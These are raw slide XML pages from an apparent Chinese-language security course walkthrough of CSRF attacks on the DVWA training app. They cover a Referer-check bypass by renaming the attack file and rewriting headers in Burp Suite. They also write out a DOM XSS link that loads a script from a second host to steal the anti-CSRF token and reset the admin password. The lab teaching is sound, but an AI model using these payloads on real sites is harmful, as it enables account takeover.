              <a:t>打开Firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>浏览器</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，点击右上角的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>选项卡，点击Preferences，点击General，找到Network Settings，点击Setting…，选择</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Manual Proxy Configuration，填写HTTP Proxy为127.0.0.1，Port为8080，点击OK，完成设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" kern="100" dirty="0">
              <a:effectLst/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 72"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2334260" y="2950845"/>
            <a:ext cx="6236335" cy="369824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7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5850255" y="1879600"/>
            <a:ext cx="361950" cy="333375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6487160" y="2271395"/>
            <a:ext cx="295275" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="标题 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>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00" y="1247775"/>
            <a:ext cx="11017250" cy="84899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（1）查看源代码</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zh-CN" sz="2400">
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2"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6" name="图片 -2147482612"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3222000" y="2203450"/>
            <a:ext cx="5760000" cy="4364279"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="375285"/>
            <a:ext cx="1080000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90" y="1247775"/>
            <a:ext cx="10800000" cy="501396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）源代码分析</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在判断$pass_new == $pass_conf之前</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使用stripos()函数</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sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>检查HTTP请求中的Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>值</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（$_SERVER['HTTP_REFERER']）是否包含服务器的主机名或IP地址（$_SERVER['SERVER_NAME']）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</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zh-CN"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这样，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>过滤规则是</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http</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包头的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Referer</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值必须包含服务器的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IP</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地址</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</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如果把csrf_test.html的文件名修改为：192.168.1.201.html，就可以通过服务器端程序检查。</a:t>
            </a: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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="375285"/>
            <a:ext cx="1080000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90" y="1247775"/>
            <a:ext cx="10800000" cy="209423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sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞利用</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en-US" sz="2400">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2"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在客户机上，打开新标签页，访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://192.168.1.228/192.168.1.201.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，这时管理员账户“admin”的密码被自动更改为“123456”，漏洞利用成功。</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20000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5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标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="375285"/>
            <a:ext cx="1080000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2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2785745" y="3214370"/>
            <a:ext cx="6619875" cy="2562225"/>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90" y="1249200"/>
            <a:ext cx="11017250" cy="36652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sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用Burp Suite查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>自动发起的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据包</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可以看到，Referer值是http://192.168.1.228/192.168.1.201.html，它包含了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>W</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eb</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的IP地址192.168.1.201。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="375285"/>
            <a:ext cx="1080000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10" name="图片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1584000" y="2965768"/>
            <a:ext cx="9000000" cy="1972647"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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90" y="1249045"/>
            <a:ext cx="10836000" cy="534860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1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分析</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>medium</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>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注意</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在高版本的Firefox浏览器中，通过在新标签页打开</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://192.168.1.228/192.168.1.201.html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进行CSRF攻击不再有效。经过抓包分析，我们发现HTTP请求的Referer头部仅显示为http://192.168.1.228/，并没有包含192.168.1.201。这表明浏览器的安全性更新阻止了攻击载荷的执行。</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endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400">
              <a:ea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endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400">
              <a:ea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endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400">
              <a:ea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endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400">
              <a:ea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endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400">
              <a:ea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zh-CN" altLang="zh-CN" sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为了绕过这一限制，我们使用Burp Suite来拦截并修改数据包，将Referer头部修改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://192.168.1.228/192.168.1.201.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，这样就可以实现CSRF攻击了。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="375285"/>
            <a:ext cx="1080000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7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1584000" y="3283903"/>
            <a:ext cx="9000000" cy="1959162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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572770" y="1247775"/>
            <a:ext cx="11017250" cy="88836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（1）查看源代码，分析漏洞的利用方法</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8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3" name="图片 -2147482611"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2188210" y="2195195"/>
            <a:ext cx="6108171" cy="4500000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>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572770" y="1247775"/>
            <a:ext cx="11017250" cy="343408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（1）查看源代码，分析漏洞的利用方法</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可以看到，High级别的代码加入了Anti-CSRF token机制，用户每次访问</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修</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改密</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页面时，服务器会返回一个随机的token</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向服务器发起请求时，需要提交token参数，而服务器在收到请求时，会优先检查token，只有token正确，才会处理客户端的请求。</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要绕过High级别的反CSRF机制，关键是要获取token，要利用受害者的cookie去修改密码的页面获取关键的token。    </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572770" y="1247775"/>
            <a:ext cx="11017250" cy="174688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（2）漏洞利用</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① 编写</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xss.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，将其放置于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Web</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服务器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B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上。</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通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://192.168.1.228/xss.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以看到xss.js的代码。</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9" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2531110" y="3013710"/>
            <a:ext cx="6123940" cy="3632200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>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572770" y="1247775"/>
            <a:ext cx="11017250" cy="337439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2</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>分析high级别的CSRF源代码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（2）漏洞利用</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仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>②</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DOM XSS与CSRF结合实现漏洞利用</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:ea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通过XSS来获取用户的user_token，通过CSRF来伪造URL，冒充用户身份修改密码。用以下链接来让</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用户</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>访问：			http://192.168.1.201/dvwa/vulnerabilities/xss_d/?default=English #&lt;script src="http://192.168.1.228/xss.js"&gt;&lt;/script&gt;。</a:t>
            </a:r>
            <a:endParaRPr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诱导点击后，成功将密码修改为123456。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </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sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
